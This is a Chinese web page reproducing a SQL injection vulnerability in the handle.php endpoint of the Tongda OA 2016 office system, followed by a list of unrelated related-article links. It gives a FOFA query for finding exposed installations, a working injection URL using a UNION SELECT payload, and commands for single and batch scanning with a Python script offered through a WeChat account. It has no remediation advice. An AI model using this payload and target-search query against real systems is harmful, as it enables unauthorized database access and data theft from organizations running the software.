当前位置: 首页 > news >正文

通达OA 2016网络智能办公系统 handle.php SQL注入漏洞

一、漏洞描述

北京通达信科科技有限公司通达OA2016网络智能办公系统 handle.php 存在sql注入漏洞,攻击者可利用此漏洞获取数据库管理员权限,查询数据、获取系统信息,威胁企业单位数据安全。

二、网络空间搜索引擎查询

fofa查询

app="TDXK-通达OA" && body="2016"

三、漏洞复现

poc

/share/handle.php?_GET[module]=1%27+and+1={`=%27`+1}+and+1=0+union+select+(select/**/user())--+%27

浏览器直接访问

四、批量检测

单个检测

 python .\TdOA2016.py -u  http://ip:port

批量检测

 python .\TdOA2016.py -u filename

微信公众号关注 网络安全透视镜 回复 20231016 获取批量检测脚本

http://www.lryc.cn/news/196351.html

相关文章:

  • parameter的各种用法以及localparam的用法
  • 网络社区挖掘-图论部分的基本知识笔记
  • Vue Router - 路由的使用、两种切换方式、两种传参方式、嵌套方式
  • mysql为什么会选错索引,以及优化器是如何选择索引的
  • vue基础知识十七:你知道vue中key的原理吗?说说你对它的理解
  • 攻防演练蓝队|Windows应急响应入侵排查
  • uniapp 小程序实现图片宽度100%、高度自适应的效果
  • 05. NXP官方SDK使用实验
  • Python- JSON使用初探
  • vim的配置文件
  • [python] pytest
  • 【王道代码】【2.2顺序表】d1
  • 【Linux】【创建文件】Linux系统下在命令行中创建文件的方法
  • Pytorch之MobileViT图像分类
  • 03在命令行环境中创建Maven版的Java工程,了解pom.xml文件的结构,了解Java工程的目录结构并编写代码,执行Maven相关的构建命令
  • 论文阅读:CenterFormer: Center-based Transformer for 3D Object Detection
  • Arduino驱动BNO055九轴绝对定向传感器(惯性测量传感器篇)
  • MQTT测试工具及使用教程
  • yolov7改进优化之蒸馏(一)
  • 视频美颜SDK,提升企业视频通话质量与形象
  • webmin远程命令执行漏洞
  • docker离线安装和使用
  • 解决 MyBatis 一对多查询中,出现每组元素只有一个,总组数与元素数总数相等的问题
  • 这应该是关于回归模型最全的总结了(附原理+代码)
  • 基于闪电连接过程优化的BP神经网络(分类应用) - 附代码
  • Linux性能优化--性能工具:网络
  • 【Linux】线程互斥与同步
  • 敏捷开发中,Sprint回顾会的目的
  • 排序【七大排序】
  • 人大与加拿大女王大学金融硕士项目——立即行动,才是缓解焦虑的解药